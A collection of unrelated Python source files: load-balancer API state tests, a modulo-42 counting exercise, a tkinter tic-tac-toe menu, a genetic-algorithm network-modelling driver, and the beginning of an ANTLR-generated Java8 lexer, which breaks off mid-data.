delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 202)
def test_load_balancer_reverts_from_pending_update_state(self):
"""
Test to verify a load balancer goes into PENDING-UPDATE state, for
the given time in seconds.
"""
metadata = [{"key": "lb_pending_update", "value": 1}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
# get loadbalncer after adding node and verify its in PENDING-UPDATE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "PENDING-UPDATE")
self.helper.clock.advance(1.0)
# get loadbalncer after adding node and verify its in ACTIVE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "ACTIVE")
def test_delete_load_balancer_and_pending_delete_state(self):
"""
Test to verify a load balancer goes into PENDING-DELETE state, for
the given time in seconds and then goes into a DELETED status.
Also, verify when a load balancer in PENDING-DELETE or DELETED status
is deleted, response code 400 is returned.
"""
metadata = [{"key": "lb_pending_delete", "value": 1}]
lb = self._create_loadbalancer(metadata)
# Verify the lb status goes into PENDING-DELETE
del_lb_response = self._delete_loadbalancer(lb["id"])
self.assertEqual(del_lb_response.code, 202)
del_lb_content = self.successResultOf(treq.content(del_lb_response))
self.assertEqual(del_lb_content, b'')
deleted_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(deleted_lb["loadBalancer"]["status"], "PENDING-DELETE")
# Trying to delete a lb in PENDING-DELETE status results in 400
self.assertEqual(self._delete_loadbalancer(lb["id"]).code, 400)
self.helper.clock.advance(1.0000001)
# Lb goes into DELETED status after time specified in metadata
deleted_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(deleted_lb["loadBalancer"]["status"], "DELETED")
# Trying to delete a lb in DELETED status results in 400
self.assertEqual(self._delete_loadbalancer(lb["id"]).code, 400)
# GET node on load balancer in DELETED status results in 410
get_node = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123')
get_node_response = self.successResultOf(get_node)
self.assertEqual(get_node_response.code, 410)
# GET node feed on load balancer in DELETED status results in 410
node_feed = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123.atom')
node_feed_response = self.successResultOf(node_feed)
self.assertEqual(node_feed_response.code, 410)
# List node on load balancer in DELETED status results in 410
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb["id"])
+ '/nodes')
self.assertEqual(self.successResultOf(list_nodes).code, 410)
# Progress past "deleting now"
self.helper.clock.advance(4000)
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb["id"])
+ '/nodes')
self.assertEqual(self.successResultOf(list_nodes).code, 404)
def test_bulk_delete_empty_list_takes_precedence_over_immutable(self):
"""
When bulk deleting no nodes, the error indicating nodes must be specified
is returned even when the LB is not ACTIVE.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(updated_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Now, trying to bulk-delete an empty list of nodes will still return
# the empty-nodes error.
response, body = _bulk_delete(self, self.root, self.uri, lb['id'], [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_not_active(self):
"""
When bulk deleting nodes while the LB is not ACTIVE, a special error is
returned, even when some of the nodes are invalid.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(updated_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Now, trying to bulk-delete nodes (including invalid ones) will cause
# it to return the special error
response, body = _bulk_delete(
self, self.root, self.uri, lb['id'], [100, 200])
self.assertEqual(response.code, 422)
self.assertEqual(
body,
{u'message': u'LoadBalancer is not ACTIVE', u'code': 422})
def test_updating_node_loadbalancer_state(self):
"""
If the load balancer is not active, when updating a node a 422 error
is returned.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb_id = self._create_loadbalancer(metadata)["id"]
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb_id)
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb_id)
self.assertEqual(updated_lb["loadBalancer"]["status"],
"PENDING-UPDATE")
node = self.successResultOf(treq.json_content(create_node_response))
node_id = node["nodes"][0]["id"]
resp, body = _update_clb_node(self, self.helper, lb_id, node_id,
{"node": {"weight": 1}})
self.assertEqual((body, resp.code),
considered_immutable_error("PENDING-UPDATE", lb_id))
|
# 두 자연수 A와 B가 있을 때, A%B는 A를 B로 나눈 나머지이다.
# 수 10개를 입력받은 뒤, 이를 42로 나눈 나머지를 구한다.
# 그 다음 서로 다른 값이 몇 개 있는지 출력하는 프로그램을 작성하시오.
arr = []
new_arr = []
for i in range(10):
number = int(input())
arr.append(number%42)
for i in arr:
if i not in new_arr:
new_arr.append(i)
print(len(new_arr))
|
import tkinter as tk
import AI
TITLE_FONT = ("Helvetica", 24, "bold")
class tictactoe_game(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
path = "bg.jpg"
container = tk.Frame(self)
container.pack(side="top", fill="both", expand=True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
self.frames = {}
for F in (menu, roll_credits):# input frame name here
page_name = F.__name__
frame = F(parent=container, controller=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame("menu")
def show_frame(self, page_name):
'''Show a frame for the given page name'''
frame = self.frames[page_name]
frame.tkraise()
class menu(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent, bg="white")
self.controller = controller
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Tic-Tac-Toe", font=TITLE_FONT, bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
button1 = tk.Button(self, text="Single Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
button2 = tk.Button(self, text="Multi-Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
button3 = tk.Button(self, text="Online Multi-Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
button4 = tk.Button(self, text="Credits", bg="black", fg="white", command=lambda: controller.show_frame("roll_credits")).pack(fill="both", expand=True)
button5 = tk.Button(self, text="Exit Game", bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
class roll_credits (tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent, bg="white")
self.controller = controller
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Credits", font=TITLE_FONT, bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Created by", bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Kyle Speke + Taylor Southorn", bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Harry Hudson + Ayyub Lindroos", bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, text="Faizan Ahmed", bg="black", fg="white").pack(fill="both", expand=True)
label = tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
button1 = tk.Button(self, text="Return", bg="black", fg="white", command=lambda: controller.show_frame("menu")).pack(fill="both", expand=True)
if __name__ == "__main__":
app = tictactoe_game()
app.title("Tic-Tac-Toe")
|
"""
@author: David
inspired by Telmo Menezes's work : telmomenezes.com
"""
import sys
import matplotlib
matplotlib.use('Agg')
import numpy as np
from multiprocessing import Pool
import network_evaluation as ne
import genetic_algorithm as ga
import warnings
import os
import random
np.seterr('ignore')
warnings.filterwarnings("ignore")
'''
This is the main file of the program :
it stores datas from the real network necessary to the chosen evaluation method
define the genetic algorithm and its grammar
and call it
'''
def main():
number_of_nodes = int(sys.argv[1])
name = sys.argv[2]
resdir = sys.argv[3]
#network_name = name.replace(".gexf","")
network_name = name
data_path = name
#data_path = "data/"+network_name
#res_path = "data/"+network_name+"_"+str(number_of_nodes)+"_u"
#if not os.path.isfile(res_path+'_stats.txt'):
if not os.path.exists(resdir):
os.mkdir(resdir)
results_path = resdir + "/result.xml" #sys.argv[3] #res_path+"_results.xml"
stats_path = resdir + "/stats.txt" #res_path+'_stats.txt'
dot_path = resdir + "/trees.jpeg"
nb_generations = 40
freq_stats = 5
evaluation_method = "communities_degrees_distances_clustering_importance"
tree_type = "with_constants"
extension = ".gexf"
multiprocessing = False
dynamic = False
print network_name
network_type = "directed_unweighted"
evaluation_method = "degrees_communities_distances_clustering_importance"
ne.get_datas_from_real_network(data_path,
results_path,
name=network_name,
evaluation_method=evaluation_method,
dynamic=dynamic)
genome = ga.new_genome(
results_path,
name=network_name,
data_path=data_path,
evaluation_method=evaluation_method,
dynamic=dynamic,
tree_type=tree_type,
network_type=network_type,
extension=extension,
number_of_nodes = number_of_nodes
)
# optional arguments for evolve :
# *nb_generations : number of generations of the evolution
# possible values : int > 0 : default : 100
# *freq_stats : number of generations between two prints of statistics
# possible values : int > 0 : default : 5
# *stats_path : path to the file where the stats will be printed
# *multiprocessing : will use or not multiprocessing
# possible values : True False
ga.evolve(genome, stats_path=stats_path, dot_path=dot_path, nb_generations=nb_generations, freq_stats=freq_stats,
multiprocessing=multiprocessing)
if __name__ == "__main__":
#files =[file for file in os.listdir("data") if ".gexf" in file]
# files = [sys.argv[2]]
# random.shuffle(files)
# try :
# multiproc = sys.argv[2]
# except :
# multiproc = False
# if not multiproc :
# for file in files :
main()
# else :
# pool = Pool(16)
# pool.map(main, files)
# pool.close()
|
# Generated from ./Java8.g4 by ANTLR 4.7.1
# encoding: utf-8
from __future__ import print_function
from antlr4 import *
from io import StringIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write(u"\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2")
buf.write(u"m\u044c\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4")
buf.write(u"\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r")
buf.write(u"\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22")
buf.write(u"\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4")
buf.write(u"\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35")
buf.write(u"\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4")
buf.write(u"$\t$\4%\t%\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t")
buf.write(u",\4-\t-\4.\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63")
buf.write(u"\t\63\4\64\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\4")
buf.write(u"9\t9\4:\t:\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA")
buf.write(u"\4B\tB\4C\tC\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\t")
buf.write(u"J\4K\tK\4L\tL\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S")
buf.write(u"\tS\4T\tT\4U\tU\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4")
buf.write(u"\\\t\\\4]\t]\4^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\t")
buf.write(u"d\4e\te\4f\tf\4g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m")
buf.write(u"\tm\4n\tn\4o\to\4p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4")
buf.write(u"v\tv\4w\tw\4x\tx\4y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~")
buf.write(u"\4\177\t\177\4\u0080\t\u0080\4\u0081\t\u0081\4\u0082")
buf.write(u"\t\u0082\4\u0083\t\u0083\4\u0084\t\u0084\4\u0085\t\u0085")
buf.write(u"\4\u0086\t\u0086\4\u0087\t\u0087\4\u0088\t\u0088\4\u0089")
buf.write(u"\t\u0089\4\u008a\t\u008a\4\u008b\t\u008b\4\u008c\t\u008c")
buf.write(u"\4\u008d\t\u008d\4\u008e\t\u008e\4\u008f\t\u008f\4\u0090")
buf.write(u"\t\u0090\4\u0091\t\u0091\4\u0092\t\u0092\4\u0093\t\u0093")
buf.write(u"\4\u0094\t\u0094\4\u0095\t\u0095\4\u0096\t\u0096\4\u0097")
buf.write(u"\t\u0097\4\u0098\t\u0098\4\u0099\t\u0099\4\u009a\t\u009a")
buf.write(u"\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3")
buf.write(u"\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\5\3\5")
buf.write(u"\3\5\3\5\3\5\3\5\3\6\3\6\3\6\3\6\3\6\3\7\3\7\3\7\3\7")
buf.write(u"\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3\n")
buf.write(u"\3\n\3\n\3\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3")
buf.write(u"\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3")
buf.write(u"\r\3\r\3\r\3\r\3\16\3\16\3\16\3\17\3\17\3\17\3\17\3\17")
buf.write(u"\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\21\3\21\3\21\3")
buf.write(u"\21\3\21\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\23")
buf.write(u"\3\23\3\23\3\23\3\23\3\23\3\24\3\24\3\24\3\24\3\24\3")
buf.write(u"\24\3\24\3\24\3\25\3\25\3\25\3\25\3\25\3\25\3\26\3\26")
buf.write(u"\3\26\3\26\3\27\3\27\3\27\3\30\3\30\3\30\3\30\3\30\3")
buf.write(u"\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31")
buf.write(u"\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3")
buf.write(u"\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\34\3\34\3\34")
buf.write(u"\3\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3")
buf.write(u"\35\3\36\3\36\3\36\3\36\3\36\3\37\3\37\3\37\3\37\3\37")
buf.write(u"\3\37\3\37\3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3!\3\"\3")
buf.write(u"\"\3\"\3\"\3\"\3\"\3\"\3\"\3#\3#\3#\3#\3#\3#\3#\3#\3")
buf.write(u"#\3#\3$\3$\3$\3$\3$\3$\3$\3%\3%\3%\3%\3%\3%\3%\3&\3&")
buf.write(u"\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3(\3(\3(\3(")
buf.write(u"\3(\3(\3(\3(\3(\3)\3)\3)\3)\3)\3)\3*\3*\3*\3*\3*\3*\3")
buf.write(u"*\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3,\3,\3,\3,")
buf.write(u"\3,\3-\3-\3-\3-\3-\3-\3.\3.\3.\3.\3.\3.\3.\3/\3/\3/\3")
buf.write(u"/\3/\3/\3/\3/\3/\3/\3\60\3\60\3\60\3\60\3\61\3\61\3\61")
buf.write(u"\3\61\3\61\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3")
buf.write(u"\62\3\63\3\63\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64")
buf.write(u"\5\64\u028d\n\64\3\65\3\65\5\65\u0291\n\65\3\66\3\66")
buf.write(u"\5\66\u0295\n\66\3\67\3\67\5\67\u0299\n\67\38\38\58\u029d")
buf.write(u"\n8\39\39\3:\3:\3:\5:\u02a4\n:\3:\3:\3:\5:\u02a9\n:\5")
buf.write(u":\u02ab\n:\3;\3;\5;\u02af\n;\3;\5;\u02b2\n;\3<\3<\5<")
buf.write(u"\u02b6\n<\3=\3=\3>\6>\u02bb\n>\r>\16>\u02bc\3?\3?\5?")
buf.write(u"\u02c1\n?\3@\6@\u02c4\n@\r@\16@\u02c5\3A\3A\3A\3A\3B")
buf.write(u"\3B\5B\u02ce\nB\3B\5B\u02d1\nB\3C\3C\3D\6D\u02d6\nD\r")
buf.write(u"D\16D\u02d7\3E\3E\5E\u02dc\nE\3F\3F\5F\u02e0\nF\3F\3")
buf.write(u"F\3G\3G\5G\u02e6\nG\3G\5G\u02e9\nG\3H\3H\3I\6I\u02ee")
buf.write(u"\nI\rI\16I\u02ef\3J\3J\5J\u02f4\nJ\3K\3K\3K\3K\3L\3L")
buf.write(u"\5L\u02fc\nL\3L\5L\u02ff\nL\3M\3M\3N\6N\u0304\nN\rN\16")
buf.write(u"N\u0305\3O\3O\5O\u030a\nO\3P\3P\5P\u030e\nP\3Q\3Q\3Q")
buf.write(u"\5Q\u0313\nQ\3Q\5Q\u0316\nQ\3Q\5Q\u0319\nQ\3Q\3Q\3Q\5")
buf.write(u"Q\u031e\nQ\3Q\5Q\u0321\nQ\3Q\3Q\3Q\5Q\u0326\nQ\3Q\3Q")
buf.write(u"\3Q\5Q\u032b\nQ\3R\3R\3R\3S\3S\3T\5T\u0333\nT\3T\3T\3")
buf.write(u"U\3U\3V\3V\3W\3W\3W\5W\u033e\nW\3X\3X\5X\u0342\nX\3X")
buf.write(u"\3X\3X\5X\u0347\nX\3X\3X\5X\u034b\nX\3Y\3Y\3Y\3Z\3Z\3")
buf.write(u"[\3[\3[\3[\3[\3[\3[\3[\3[\5[\u035b\n[\3\\\3\\\3\\\3\\")
buf.write(u"\3\\\3\\\3\\\3\\\5\\\u0365\n\\\3]\3]\3^\3^\5^\u036b\n")
buf.write(u"^\3^\3^\3_\6_\u0370\n_\r_\16_\u0371\3`\3`\5`\u0376\n")
buf.write(u"`\3a\3a\3a\3a\5a\u037c\na\3b\3b\3b\3b\3b\3b\3b\3b\3b")
buf.write(u"\3b\3b\5b\u0389\nb\3c\3c\3d\3d\6d\u038f\nd\rd\16d\u0390")
buf.write(u"\3d\3d\3d\3d\3d\3e\3e\3e\3e\3e\3f\3f\3g\3g\3h\3h\3i\3")
buf.write(u"i\3j\3j\3k\3k\3l\3l\3m\3m\3n\3n\3o\3o\3p\3p\3q\3q\3r")
buf.write(u"\3r\3s\3s\3t\3t\3u\3u\3v\3v\3v\3w\3w\3w\3x\3x\3x\3y\3")
buf.write(u"y\3y\3z\3z\3z\3{\3{\3{\3|\3|\3|\3}\3}\3}\3~\3~\3\177")
buf.write(u"\3\177\3\u0080\3\u0080\3\u0081\3\u0081\3\u0082\3\u0082")
buf.write(u"\3\u0083\3\u0083\3\u0084\3\u0084\3\u0085\3\u0085\3\u0086")
buf.write(u"\3\u0086\3\u0086\3\u0087\3\u0087\3\u0087\3\u0088\3\u0088")
buf.write(u"\3\u0088\3\u0089\3\u0089\3\u0089\3\u008a\3\u008a\3\u008a")
buf.write(u"\3\u008b\3\u008b\3\u008b\3\u008c\3\u008c\3\u008c\3\u008d")
buf.write(u"\3\u008d\3\u008d\3\u008e\3\u008e\3\u008e\3\u008f\3\u008f")
buf.write(u"\3\u008f\3\u0090\3\u0090\3\u0090\3\u0090\3\u0091\3\u0091")
buf.write(u"\3\u0091\3\u0091\3\u0092\3\u0092\3\u0092\3\u0092\3\u0092")
buf.write(u"\3\u0093\3\u0093\7\u0093\u0412\n\u0093\f\u0093\16\u0093")
buf.write(u"\u0415\13\u0093\3\u0094\3\u0094\3\u0094\3\u0094\3\u0094")
buf.write(u"\3\u0094\5\u0094\u041d\n\u0094\3\u0095\3\u0095\3\u0095")
buf.write(u"\3\u0095\3\u0095\3\u0095\5\u0095\u0425\n\u0095\3\u0096")
buf.write(u"\3\u0096\3\u0097\3\u0097\3\u0097\3\u0097\3\u0098\6\u0098")
buf.write(u"\u042e\n\u0098\r\u0098\16\u0098\u042f\3\u0098\3\u0098")
buf.write(u"\3\u0099\3\u0099\3\u0099\3\u0099\7\u0099\u0438\n\u0099")
buf.write(u"\f\u0099\16\u0099\u043b\13\u0099\3\u0099\3\u0099\3\u0099")
buf.write(u"\3\u0099\3\u0099\3\u009a\3\u009a\3\u009a\3\u009a\7\u009a")
buf.write(u"\u0446\n\u009a\f\u009a\16\u009a\u0449\13\u009a\3\u009a")
buf.write(u"\3\u009a\3\u0439\2\u009b\3\3\5\4\7\5\t\6\13\7\r\b\17")
buf.write(u"\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21!\22#")
buf.write(u"\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67\35")
buf.write(u"9\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62")
buf.write(u"c\63e\64g\65i\2k\2m\2o\2q\2s\2u\2w\2y\2{\2}\2\177\2\u0081")
buf.write(u"\2\u0083\2\u0085\2\u0087\2\u0089\2\u008b\2\u008d\2\u008f")
buf.write(u"\2\u0091\2\u0093\2\u0095\2\u0097\2\u0099\2\u009b\2\u009d")
buf.write(u"\2\u009f\66\u00a1\2\u00a3\2\u00a5\2\u00a7\2\u00a9\2\u00ab")
buf.write(u"\2\u00ad\2\u00af\2\u00b1\2\u00b3\2\u00b5\67\u00b78\u00b9")
buf.write(u"\2\u00bb9\u00bd\2\u00bf\2\u00c1\2\u00c3\2\u00c5\2\u00c7")
buf.write(u"\2\u00c9:\u00cb;\u00cd<\u00cf=\u00d1>\u00d3?\u00d5@\u00d7")
buf.write(u"A\u00d9B\u00dbC\u00ddD\u00dfE\u00e1F\u00e3G\u00e5H\u00e7")
buf.write(u"I\u00e9J\u00ebK\u00edL\u00efM\u00f1N\u00f3O\u00f5P\u00f7")
buf.write(u"Q\u00f9R\u00fbS\u00fdT\u00ffU\u0101V\u0103W\u0105X\u0107")
buf.write(u"Y\u0109Z\u010b[\u010d\\\u010f]\u0111^\u0113_\u0115`\u0117")
buf.write(u"a\u0119b\u011bc\u011dd\u011fe\u0121f\u0123g\u0125h\u0127")
buf.write(u"\2\u0129\2\u012bi\u012dj\u012fk\u0131l\u0133m\3\2\30")
buf.write(u"\4\2NNnn\3\2\63;\4\2ZZzz\5\2\62;CHch\3\2\629\4\2DDdd")
buf.write(u"\3\2\62\63\4\2GGgg\4\2--//\6\2FFHHffhh\4\2RRrr\6\2\f")
buf.write(u"\f\17\17))^^\6\2\f\f\17\17$$^^\n\2$$))^^ddhhppttvv\3")
buf.write(u"\2\62\65\6\2&&C\\aac|\4\2\2\u0081\ud802\udc01\3\2\ud802")
buf.write(u"\udc01\3\2\udc02\ue001\7\2&&\62;C\\aac|\5\2\13\f\16\17")
buf.write(u"\"\"\4\2\f\f\17\17\2\u045b\2\3\3\2\2\2\2\5\3\2\2\2\2")
buf.write(u"\7\3\2\2\2\2\t\3\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17")
buf.write(u"\3\2\2\2\2\21\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27")
buf.write(u"\3\2\2\2\2\31\3\2\2\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37")
buf.write(u"\3\2\2\2\2!\3\2\2\2\2#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2")
buf.write(u"\2)\3\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2")
buf.write(u"\2\2\2\63\3\2\2\2\2\65\3\2\2\2\2\67\3\2\2\2\29\3\2\2")
buf.write(u"\2\2;\3\2\2\2\2=\3\2\2\2\2?\3\2\2\2\2A\3\2\2\2\2C\3\2")
buf.write(u"\2\2\2E\3\2\2\2\2G\3\2\2\2\2I\3\2\2\2\2K\3\2\2\2\2M\3")
buf.write(u"\2\2\2\2O\3\2\2\2\2Q\3\2\2\2\2S\3\2\2\2\2U\3\2\2\2\2")
buf.write(u"W\3\2\2\2\2Y\3\2\2\2\2[\3\2\2\2\2]\3\2\2\2\2_\3\2\2\2")
buf.write(u"\2a\3\2\2\2\2c\3\2\2\2\2e\3\2\2\2\2g\3\2\2\2\2\u009f")
buf.write(u"\3\2\2\2\2\u00b5\3\2\2\2\2\u00b7\3\2\2\2\2\u00bb\3\2")
buf.write(u"\2\2\2\u00c9\3\2\2\2\2\u00cb\3\2\2\2\2\u00cd\3\2\2\2")
buf.write(u"\2\u00cf\3\2\2\2\2\u00d1\3\2\2\2\2\u00d3\3\2\2\2\2\u00d5")
buf.write(u"\3\2\2\2\2\u00d7\3\2\2\2\2\u00d9\3\2\2\2\2\u00db\3\2")
buf.write(u"\2\2\2\u00dd\3\2\2\2\2\u00df\3\2\2\2\2\u00e1\3\2\2\2")
buf.write(u"\2\u00e3\3\2\2\2\2\u00e5\3\2\2\2\2\u00e7\3\2\2\2\2\u00e9")
buf.write(u"\3\2\2\2\2\u00eb\3\2\2\2\2\u00ed\3\2\2\2\2\u00ef\3\2")
buf.write(u"\2\2\2\u00f1\3\2\2\2\2\u00f3\3\2\2\2\2\u00f5\3\2\2\2")
buf.write(u"\2\u00f7\3\2\2\2\2\u00f9\3\2\2\2\2\u00fb\3\2\2\2\2\u00fd")
buf.write(u"\3\2\2\2\2\u00ff\3\2\2\2\2\u0101\3\2\2\2\2\u0103\3\2")
buf.write(u"\2\2\2\u0105\3\2\2\2\2\u0107\3\2\2\2\2\u0109\3\2\2\2")
buf.write(u"\2\u010b\3\2\2\2\2\u010d\3\2\2\2\2\u010f\3\2\2\2\2\u0111")
buf.write(u"\3\2\2\2\2\u0113\3\2\2\2\2\u0115\3\2\2\2\2\u0117\3\2")
buf.write(u"\2\2\2\u0119\3\2\2\2\2\u011b\3\2\2\2\2\u011d\3\2\2\2")
buf.write(u"\2\u011f\3\2\2\2\2\u0121\3\2\2\2\2\u0123\3\2\2\2\2\u0125")
buf.write(u"\3\2\2\2\2\u012b\3\2\2\2\2\u012d\3\2\2\2\2\u012f\3\2")
buf.write(u"\2\2\2\u0131\3\2\2\2\2\u0133\3\2\2\2\3\u0135\3\2\2\2")
buf.write(u"\5\u013e\3\2\2\2\7\u0145\3\2\2\2\t\u014d\3\2\2\2\13\u0153")
buf.write(u"\3\2\2\2\r\u0158\3\2\2\2\17\u015d\3\2\2\2\21\u0163\3")
buf.write(u"\2\2\2\23\u0168\3\2\2\2\25\u016e\3\2\2\2\27\u0174\3\2")
buf.write(u"\2\2\31\u017d\3\2\2\2\33\u0185\3\2\2\2\35\u0188\3\2\2")
buf.write(u"\2\37\u018f\3\2\2\2!\u0194\3\2\2\2#\u0199\3\2\2\2%\u01a1")
buf.write(u"\3\2\2\2\'\u01a7\3\2\2\2)\u01af\3\2\2\2+\u01b5\3\2\2")
buf.write(u"\2-\u01b9\3\2\2\2/\u01bc\3\2\2\2\61\u01c1\3\2\2\2\63")
buf.write(u"\u01cc\3\2\2\2\65\u01d3\3\2\2\2\67\u01de\3\2\2\29\u01e2")
buf.write(u"\3\2\2\2;\u01ec\3\2\2\2=\u01f1\3\2\2\2?\u01f8\3\2\2\2")
buf.write(u"A\u01fc\3\2\2\2C\u0204\3\2\2\2E\u020c\3\2\2\2G\u0216")
buf.write(u"\3\2\2\2I\u021d\3\2\2\2K\u0224\3\2\2\2M\u022a\3\2\2\2")
buf.write(u"O\u0231\3\2\2\2Q\u023a\3\2\2\2S\u0240\3\2\2\2U\u0247")
buf.write(u"\3\2\2\2W\u0254\3\2\2\2Y\u0259\3\2\2\2[\u025f\3\2\2\2")
buf.write(u"]\u0266\3\2\2\2_\u0270\3\2\2\2a\u0274\3\2\2\2c\u0279")
buf.write(u"\3\2\2\2e\u0282\3\2\2\2g\u028c\3\2\2\2i\u028e\3\2\2\2")
buf.write(u"k\u0292\3\2\2\2m\u0296\3\2\2\2o\u029a\3\2\2\2q\u029e")
buf.write(u"\3\2\2\2s\u02aa\3\2\2\2u\u02ac\3\2\2\2w\u02b5\3\2\2\2")
buf.write(u"y\u02b7\3\2\2\2{\u02ba\3\2\2\2}\u02c0\3\2\2\2\177\u02c3")
buf.write(u"\3\2\2\2\u0081\u02c7\3\2\2\2\u0083\u02cb\3\2\2\2\u0085")
buf.write(u"\u02d2\3\2\2\2\u0087\u02d5\3\2\2\2\u0089\u02db\3\2\2")
buf.write(u"\2\u008b\u02dd\3\2\2\2\u008d\u02e3\3\2\2\2\u008f\u02ea")
buf.write(u"\3\2\2\2\u0091\u02ed\3\2\2\2\u0093\u02f3\3\2\2\2\u0095")
buf.write(u"\u02f5\3\2\2\2\u0097\u02f9\3\2\2\2\u0099\u0300\3\2\2")
buf.write(u"\2\u009b\u0303\3\2\2\2\u009d\u0309\3\2\2\2\u009f\u030d")
buf.write(u"\3\2\2\2\u00a1\u032a\3\2\2\2\u00a3\u032c\3\2\2\2\u00a5")
buf.write(u"\u032f\3\2\2\2\u00a7\u0332\3\2\2\2\u00a9\u0336\3\2\2")
buf.write(u"\2\u00ab\u0338\3\2\2\2\u00ad\u033a\3\2\2\2\u00af\u034a")
buf.write(u"\3\2\2\2\u00b1\u034c\3\2\2\2\u00b3\u034f\3\2\2\2\u00b5")
